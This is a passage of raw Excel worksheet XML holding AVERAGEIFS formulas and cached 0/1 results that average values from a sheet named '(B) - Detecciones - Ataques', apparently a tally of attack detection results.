        <v>1</v>
      </c>
      <c r="AL206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="AM206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="AN206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="AO206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="AP206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="AR206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="AS206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="AT206" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="AU206" s="271"/>
      <c r="AV206" s="271"/>
      <c r="AW206" s="271"/>
      <c r="AX206" s="271"/>
      <c r="AY206" s="271"/>
      <c r="AZ206" s="271"/>
      <c r="BA206" s="271"/>
      <c r="BB206" s="271"/>
      <c r="BC206" s="271"/>
      <c r="BD206" s="271"/>
      <c r="BE206" s="271"/>
      <c r="BF206" s="271"/>
      <c r="BG206" s="271"/>
      <c r="BH206" s="271"/>
      <c r="BI206" s="271"/>
      <c r="BJ206" s="271"/>
      <c r="BK206" s="271"/>
      <c r="BL206" s="271"/>
      <c r="BM206" s="271"/>
      <c r="BN206" s="271"/>
      <c r="BO206" s="271"/>
      <c r="BP206" s="271"/>
      <c r="BQ206" s="271"/>
      <c r="BR206" s="271"/>
      <c r="BS206" s="271"/>
      <c r="BT206" s="271"/>
      <c r="BU206" s="271"/>
      <c r="BV206" s="271"/>
      <c r="BW206" s="271"/>
      <c r="BX206" s="271"/>
      <c r="BY206" s="271"/>
      <c r="BZ206" s="271"/>
      <c r="CA206" s="271"/>
      <c r="CB206" s="271"/>
      <c r="CC206" s="271"/>
      <c r="CD206" s="271"/>
      <c r="CE206" s="271"/>
      <c r="CF206" s="271"/>
      <c r="CG206" s="271"/>
      <c r="CH206" s="271"/>
      <c r="CI206" s="271"/>
      <c r="CJ206" s="271"/>
      <c r="CK206" s="271"/>
      <c r="CL206" s="271"/>
      <c r="CM206" s="271"/>
      <c r="CN206" s="271"/>
      <c r="CO206" s="271"/>
      <c r="CP206" s="271"/>
      <c r="CQ206" s="271"/>
      <c r="CR206" s="271"/>
      <c r="CS206" s="271"/>
      <c r="CT206" s="271"/>
      <c r="CU206" s="271"/>
      <c r="CV206" s="271"/>
      <c r="CW206" s="271"/>
      <c r="CX206" s="271"/>
      <c r="CY206" s="271"/>
      <c r="CZ206" s="271"/>
      <c r="DA206" s="271"/>
      <c r="DB206" s="271"/>
      <c r="DC206" s="271"/>
      <c r="DD206" s="271"/>
      <c r="DE206" s="271"/>
      <c r="DF206" s="271"/>
      <c r="DG206" s="271"/>
      <c r="DH206" s="271"/>
      <c r="DI206" s="271"/>
      <c r="DJ206" s="271"/>
      <c r="DK206" s="271"/>
    </row>
    <row r="207">
      <c r="K207" s="173"/>
      <c r="N207" s="173"/>
      <c r="Q207" s="271"/>
      <c r="R207" s="510"/>
      <c r="S207" s="510"/>
      <c r="T207" s="510"/>
      <c r="U207" s="510"/>
      <c r="V207" s="510"/>
      <c r="W207" s="510"/>
      <c r="X207" s="271"/>
      <c r="Y207" s="271"/>
      <c r="Z207" s="271"/>
      <c r="AA207" s="271"/>
      <c r="AB207" s="271"/>
      <c r="AC207" s="271"/>
      <c r="AD207" s="271"/>
      <c r="AE207" s="271"/>
      <c r="AF207" s="271"/>
      <c r="AG207" s="271"/>
      <c r="AH207" s="352" t="s">
        <v>771</v>
      </c>
      <c r="AI207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS207" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT207" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU207" s="271"/>
      <c r="AV207" s="271"/>
      <c r="AW207" s="271"/>
      <c r="AX207" s="271"/>
      <c r="AY207" s="271"/>
      <c r="AZ207" s="271"/>
      <c r="BA207" s="271"/>
      <c r="BB207" s="271"/>
      <c r="BC207" s="271"/>
      <c r="BD207" s="271"/>
      <c r="BE207" s="271"/>
      <c r="BF207" s="271"/>
      <c r="BG207" s="271"/>
      <c r="BH207" s="271"/>
      <c r="BI207" s="271"/>
      <c r="BJ207" s="271"/>
      <c r="BK207" s="271"/>
      <c r="BL207" s="271"/>
      <c r="BM207" s="271"/>
      <c r="BN207" s="271"/>
      <c r="BO207" s="271"/>
      <c r="BP207" s="271"/>
      <c r="BQ207" s="271"/>
      <c r="BR207" s="271"/>
      <c r="BS207" s="271"/>
      <c r="BT207" s="271"/>
      <c r="BU207" s="271"/>
      <c r="BV207" s="271"/>
      <c r="BW207" s="271"/>
      <c r="BX207" s="271"/>
      <c r="BY207" s="271"/>
      <c r="BZ207" s="271"/>
      <c r="CA207" s="271"/>
      <c r="CB207" s="271"/>
      <c r="CC207" s="271"/>
      <c r="CD207" s="271"/>
      <c r="CE207" s="271"/>
      <c r="CF207" s="271"/>
      <c r="CG207" s="271"/>
      <c r="CH207" s="271"/>
      <c r="CI207" s="271"/>
      <c r="CJ207" s="271"/>
      <c r="CK207" s="271"/>
      <c r="CL207" s="271"/>
      <c r="CM207" s="271"/>
      <c r="CN207" s="271"/>
      <c r="CO207" s="271"/>
      <c r="CP207" s="271"/>
      <c r="CQ207" s="271"/>
      <c r="CR207" s="271"/>
      <c r="CS207" s="271"/>
      <c r="CT207" s="271"/>
      <c r="CU207" s="271"/>
      <c r="CV207" s="271"/>
      <c r="CW207" s="271"/>
      <c r="CX207" s="271"/>
      <c r="CY207" s="271"/>
      <c r="CZ207" s="271"/>
      <c r="DA207" s="271"/>
      <c r="DB207" s="271"/>
      <c r="DC207" s="271"/>
      <c r="DD207" s="271"/>
      <c r="DE207" s="271"/>
      <c r="DF207" s="271"/>
      <c r="DG207" s="271"/>
      <c r="DH207" s="271"/>
      <c r="DI207" s="271"/>
      <c r="DJ207" s="271"/>
      <c r="DK207" s="271"/>
    </row>
    <row r="208">
      <c r="K208" s="173"/>
      <c r="N208" s="173"/>
      <c r="Q208" s="271"/>
      <c r="R208" s="510"/>
      <c r="S208" s="510"/>
      <c r="T208" s="510"/>
      <c r="U208" s="510"/>
      <c r="V208" s="510"/>
      <c r="W208" s="510"/>
      <c r="X208" s="271"/>
      <c r="Y208" s="271"/>
      <c r="Z208" s="271"/>
      <c r="AA208" s="271"/>
      <c r="AB208" s="271"/>
      <c r="AC208" s="271"/>
      <c r="AD208" s="271"/>
      <c r="AE208" s="271"/>
      <c r="AF208" s="271"/>
      <c r="AG208" s="271"/>
      <c r="AH208" s="352" t="s">
        <v>724</v>
      </c>
      <c r="AI208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS208" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT208" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU208" s="271"/>
      <c r="AV208" s="271"/>
      <c r="AW208" s="271"/>
      <c r="AX208" s="271"/>
      <c r="AY208" s="271"/>
      <c r="AZ208" s="271"/>
      <c r="BA208" s="271"/>
      <c r="BB208" s="271"/>
      <c r="BC208" s="271"/>
      <c r="BD208" s="271"/>
      <c r="BE208" s="271"/>
      <c r="BF208" s="271"/>
      <c r="BG208" s="271"/>
      <c r="BH208" s="271"/>
      <c r="BI208" s="271"/>
      <c r="BJ208" s="271"/>
      <c r="BK208" s="271"/>
      <c r="BL208" s="271"/>
      <c r="BM208" s="271"/>
      <c r="BN208" s="271"/>
      <c r="BO208" s="271"/>
      <c r="BP208" s="271"/>
      <c r="BQ208" s="271"/>
      <c r="BR208" s="271"/>
      <c r="BS208" s="271"/>
      <c r="BT208" s="271"/>
      <c r="BU208" s="271"/>
      <c r="BV208" s="271"/>
      <c r="BW208" s="271"/>
      <c r="BX208" s="271"/>
      <c r="BY208" s="271"/>
      <c r="BZ208" s="271"/>
      <c r="CA208" s="271"/>
      <c r="CB208" s="271"/>
      <c r="CC208" s="271"/>
      <c r="CD208" s="271"/>
      <c r="CE208" s="271"/>
      <c r="CF208" s="271"/>
      <c r="CG208" s="271"/>
      <c r="CH208" s="271"/>
      <c r="CI208" s="271"/>
      <c r="CJ208" s="271"/>
      <c r="CK208" s="271"/>
      <c r="CL208" s="271"/>
      <c r="CM208" s="271"/>
      <c r="CN208" s="271"/>
      <c r="CO208" s="271"/>
      <c r="CP208" s="271"/>
      <c r="CQ208" s="271"/>
      <c r="CR208" s="271"/>
      <c r="CS208" s="271"/>
      <c r="CT208" s="271"/>
      <c r="CU208" s="271"/>
      <c r="CV208" s="271"/>
      <c r="CW208" s="271"/>
      <c r="CX208" s="271"/>
      <c r="CY208" s="271"/>
      <c r="CZ208" s="271"/>
      <c r="DA208" s="271"/>
      <c r="DB208" s="271"/>
      <c r="DC208" s="271"/>
      <c r="DD208" s="271"/>
      <c r="DE208" s="271"/>
      <c r="DF208" s="271"/>
      <c r="DG208" s="271"/>
      <c r="DH208" s="271"/>
      <c r="DI208" s="271"/>
      <c r="DJ208" s="271"/>
      <c r="DK208" s="271"/>
    </row>
    <row r="209">
      <c r="K209" s="173"/>
      <c r="L209" s="173"/>
      <c r="M209" s="173"/>
      <c r="N209" s="173"/>
      <c r="Q209" s="271"/>
      <c r="R209" s="510"/>
      <c r="S209" s="510"/>
      <c r="T209" s="510"/>
      <c r="U209" s="510"/>
      <c r="V209" s="510"/>
      <c r="W209" s="510"/>
      <c r="X209" s="271"/>
      <c r="Y209" s="271"/>
      <c r="Z209" s="271"/>
      <c r="AA209" s="271"/>
      <c r="AB209" s="271"/>
      <c r="AC209" s="271"/>
      <c r="AD209" s="271"/>
      <c r="AE209" s="271"/>
      <c r="AF209" s="271"/>
      <c r="AG209" s="271"/>
      <c r="AH209" s="352" t="s">
        <v>211</v>
      </c>
      <c r="AI209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AK209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AL209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AM209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AN209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AO209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AP209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AR209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AS209" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AT209" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="AU209" s="271"/>
      <c r="AV209" s="271"/>
      <c r="AW209" s="271"/>
      <c r="AX209" s="271"/>
      <c r="AY209" s="271"/>
      <c r="AZ209" s="271"/>
      <c r="BA209" s="271"/>
      <c r="BB209" s="271"/>
      <c r="BC209" s="271"/>
      <c r="BD209" s="271"/>
      <c r="BE209" s="271"/>
      <c r="BF209" s="271"/>
      <c r="BG209" s="271"/>
      <c r="BH209" s="271"/>
      <c r="BI209" s="271"/>
      <c r="BJ209" s="271"/>
      <c r="BK209" s="271"/>
      <c r="BL209" s="271"/>
      <c r="BM209" s="271"/>
      <c r="BN209" s="271"/>
      <c r="BO209" s="271"/>
      <c r="BP209" s="271"/>
      <c r="BQ209" s="271"/>
      <c r="BR209" s="271"/>
      <c r="BS209" s="271"/>
      <c r="BT209" s="271"/>
      <c r="BU209" s="271"/>
      <c r="BV209" s="271"/>
      <c r="BW209" s="271"/>
      <c r="BX209" s="271"/>
      <c r="BY209" s="271"/>
      <c r="BZ209" s="271"/>
      <c r="CA209" s="271"/>
      <c r="CB209" s="271"/>
      <c r="CC209" s="271"/>
      <c r="CD209" s="271"/>
      <c r="CE209" s="271"/>
      <c r="CF209" s="271"/>
      <c r="CG209" s="271"/>
      <c r="CH209" s="271"/>
      <c r="CI209" s="271"/>
      <c r="CJ209" s="271"/>
      <c r="CK209" s="271"/>
      <c r="CL209" s="271"/>
      <c r="CM209" s="271"/>
      <c r="CN209" s="271"/>
      <c r="CO209" s="271"/>
      <c r="CP209" s="271"/>
      <c r="CQ209" s="271"/>
      <c r="CR209" s="271"/>
      <c r="CS209" s="271"/>
      <c r="CT209" s="271"/>
      <c r="CU209" s="271"/>
      <c r="CV209" s="271"/>
      <c r="CW209" s="271"/>
      <c r="CX209" s="271"/>
      <c r="CY209" s="271"/>
      <c r="CZ209" s="271"/>
      <c r="DA209" s="271"/>
      <c r="DB209" s="271"/>
      <c r="DC209" s="271"/>
      <c r="DD209" s="271"/>
      <c r="DE209" s="271"/>
      <c r="DF209" s="271"/>
      <c r="DG209" s="271"/>
      <c r="DH209" s="271"/>
      <c r="DI209" s="271"/>
      <c r="DJ209" s="271"/>
      <c r="DK209" s="271"/>
    </row>
    <row r="210">
      <c r="K210" s="173"/>
      <c r="L210" s="173"/>
      <c r="M210" s="173"/>
      <c r="N210" s="173"/>
      <c r="Q210" s="271"/>
      <c r="R210" s="510"/>
      <c r="S210" s="510"/>
      <c r="T210" s="510"/>
      <c r="U210" s="510"/>
      <c r="V210" s="510"/>
      <c r="W210" s="510"/>
      <c r="X210" s="271"/>
      <c r="Y210" s="271"/>
      <c r="Z210" s="271"/>
      <c r="AA210" s="271"/>
      <c r="AB210" s="271"/>
      <c r="AC210" s="271"/>
      <c r="AD210" s="271"/>
      <c r="AE210" s="271"/>
      <c r="AF210" s="271"/>
      <c r="AG210" s="271"/>
      <c r="AH210" s="352" t="s">
        <v>805</v>
      </c>
      <c r="AI210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AK210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AL210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>1</v>
      </c>
      <c r="AM210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AN210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AO210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AP210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AR210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AS210" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="AT210" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>1</v>
      </c>
      <c r="AU210" s="271"/>
      <c r="AV210" s="271"/>
      <c r="AW210" s="271"/>
      <c r="AX210" s="271"/>
      <c r="AY210" s="271"/>
      <c r="AZ210" s="271"/>
      <c r="BA210" s="271"/>
      <c r="BB210" s="271"/>
      <c r="BC210" s="271"/>
      <c r="BD210" s="271"/>
      <c r="BE210" s="271"/>
      <c r="BF210" s="271"/>
      <c r="BG210" s="271"/>
      <c r="BH210" s="271"/>
      <c r="BI210" s="271"/>
      <c r="BJ210" s="271"/>
      <c r="BK210" s="271"/>
      <c r="BL210" s="271"/>
      <c r="BM210" s="271"/>
      <c r="BN210" s="271"/>
      <c r="BO210" s="271"/>
      <c r="BP210" s="271"/>
      <c r="BQ210" s="271"/>
      <c r="BR210" s="271"/>
      <c r="BS210" s="271"/>
      <c r="BT210" s="271"/>
      <c r="BU210" s="271"/>
      <c r="BV210" s="271"/>
      <c r="BW210" s="271"/>
      <c r="BX210" s="271"/>
      <c r="BY210" s="271"/>
      <c r="BZ210" s="271"/>
      <c r="CA210" s="271"/>
      <c r="CB210" s="271"/>
      <c r="CC210" s="271"/>
      <c r="CD210" s="271"/>
      <c r="CE210" s="271"/>
      <c r="CF210" s="271"/>
      <c r="CG210" s="271"/>
      <c r="CH210" s="271"/>
      <c r="CI210" s="271"/>
      <c r="CJ210" s="271"/>
      <c r="CK210" s="271"/>
      <c r="CL210" s="271"/>
      <c r="CM210" s="271"/>
      <c r="CN210" s="271"/>
      <c r="CO210" s="271"/>
      <c r="CP210" s="271"/>
      <c r="CQ210" s="271"/>
      <c r="CR210" s="271"/>
      <c r="CS210" s="271"/>
      <c r="CT210" s="271"/>
      <c r="CU210" s="271"/>
      <c r="CV210" s="271"/>
      <c r="CW210" s="271"/>
      <c r="CX210" s="271"/>
      <c r="CY210" s="271"/>
      <c r="CZ210" s="271"/>
      <c r="DA210" s="271"/>
      <c r="DB210" s="271"/>
      <c r="DC210" s="271"/>
      <c r="DD210" s="271"/>
      <c r="DE210" s="271"/>
      <c r="DF210" s="271"/>
      <c r="DG210" s="271"/>
      <c r="DH210" s="271"/>
      <c r="DI210" s="271"/>
      <c r="DJ210" s="271"/>
      <c r="DK210" s="271"/>
    </row>
    <row r="211">
      <c r="K211" s="173"/>
      <c r="L211" s="553" t="s">
        <v>2617</v>
      </c>
      <c r="M211" s="554" t="s">
        <v>2618</v>
      </c>
      <c r="N211" s="555" t="s">
        <v>2619</v>
      </c>
      <c r="Q211" s="271"/>
      <c r="R211" s="510"/>
      <c r="S211" s="510"/>
      <c r="T211" s="510"/>
      <c r="U211" s="510"/>
      <c r="V211" s="510"/>
      <c r="W211" s="510"/>
      <c r="X211" s="271"/>
      <c r="Y211" s="271"/>
      <c r="Z211" s="271"/>
      <c r="AA211" s="271"/>
      <c r="AB211" s="271"/>
      <c r="AC211" s="271"/>
      <c r="AD211" s="271"/>
      <c r="AE211" s="271"/>
      <c r="AF211" s="271"/>
      <c r="AG211" s="271"/>
      <c r="AH211" s="352" t="s">
        <v>932</v>
      </c>
      <c r="AI211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS211" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT211" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU211" s="271"/>
      <c r="AV211" s="271"/>
      <c r="AW211" s="271"/>
      <c r="AX211" s="271"/>
      <c r="AY211" s="271"/>
      <c r="AZ211" s="271"/>
      <c r="BA211" s="271"/>
      <c r="BB211" s="271"/>
      <c r="BC211" s="271"/>
      <c r="BD211" s="271"/>
      <c r="BE211" s="271"/>
      <c r="BF211" s="271"/>
      <c r="BG211" s="271"/>
      <c r="BH211" s="271"/>
      <c r="BI211" s="271"/>
      <c r="BJ211" s="271"/>
      <c r="BK211" s="271"/>
      <c r="BL211" s="271"/>
      <c r="BM211" s="271"/>
      <c r="BN211" s="271"/>
      <c r="BO211" s="271"/>
      <c r="BP211" s="271"/>
      <c r="BQ211" s="271"/>
      <c r="BR211" s="271"/>
      <c r="BS211" s="271"/>
      <c r="BT211" s="271"/>
      <c r="BU211" s="271"/>
      <c r="BV211" s="271"/>
      <c r="BW211" s="271"/>
      <c r="BX211" s="271"/>
      <c r="BY211" s="271"/>
      <c r="BZ211" s="271"/>
      <c r="CA211" s="271"/>
      <c r="CB211" s="271"/>
      <c r="CC211" s="271"/>
      <c r="CD211" s="271"/>
      <c r="CE211" s="271"/>
      <c r="CF211" s="271"/>
      <c r="CG211" s="271"/>
      <c r="CH211" s="271"/>
      <c r="CI211" s="271"/>
      <c r="CJ211" s="271"/>
      <c r="CK211" s="271"/>
      <c r="CL211" s="271"/>
      <c r="CM211" s="271"/>
      <c r="CN211" s="271"/>
      <c r="CO211" s="271"/>
      <c r="CP211" s="271"/>
      <c r="CQ211" s="271"/>
      <c r="CR211" s="271"/>
      <c r="CS211" s="271"/>
      <c r="CT211" s="271"/>
      <c r="CU211" s="271"/>
      <c r="CV211" s="271"/>
      <c r="CW211" s="271"/>
      <c r="CX211" s="271"/>
      <c r="CY211" s="271"/>
      <c r="CZ211" s="271"/>
      <c r="DA211" s="271"/>
      <c r="DB211" s="271"/>
      <c r="DC211" s="271"/>
      <c r="DD211" s="271"/>
      <c r="DE211" s="271"/>
      <c r="DF211" s="271"/>
      <c r="DG211" s="271"/>
      <c r="DH211" s="271"/>
      <c r="DI211" s="271"/>
      <c r="DJ211" s="271"/>
      <c r="DK211" s="271"/>
    </row>
    <row r="212">
      <c r="K212" s="524" t="s">
        <v>2620</v>
      </c>
      <c r="L212" s="556">
        <f>K112</f>
        <v>2.213838631</v>
      </c>
      <c r="M212" s="557">
        <f>K109</f>
        <v>0.0499595818</v>
      </c>
      <c r="N212" s="558">
        <f t="shared" ref="N212:N223" si="199">L212-M212</f>
        <v>2.163879049</v>
      </c>
      <c r="Q212" s="271"/>
      <c r="R212" s="510"/>
      <c r="S212" s="510"/>
      <c r="T212" s="510"/>
      <c r="U212" s="510"/>
      <c r="V212" s="510"/>
      <c r="W212" s="510"/>
      <c r="X212" s="271"/>
      <c r="Y212" s="271"/>
      <c r="Z212" s="271"/>
      <c r="AA212" s="271"/>
      <c r="AB212" s="271"/>
      <c r="AC212" s="271"/>
      <c r="AD212" s="271"/>
      <c r="AE212" s="271"/>
      <c r="AF212" s="271"/>
      <c r="AG212" s="271"/>
      <c r="AH212" s="352" t="s">
        <v>1306</v>
      </c>
      <c r="AI212" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ212" s="518">
